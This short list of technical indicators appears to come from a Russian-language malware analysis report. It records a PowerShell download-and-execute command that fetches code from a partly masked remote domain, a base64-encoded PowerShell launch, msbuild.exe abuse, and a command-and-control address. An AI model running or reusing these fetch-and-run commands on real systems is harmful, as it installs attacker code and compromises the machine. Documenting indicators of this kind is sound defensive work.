Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://of#####service-secs.com/blm.task')
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- '84.##.134.21':6606
- http://of#####service-secs.com/blm.task
- http://of#####service-secs.com/blm2.txt
- DNS ASK of#####service-secs.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://of#####service-secs.com/blm.task')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAF...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'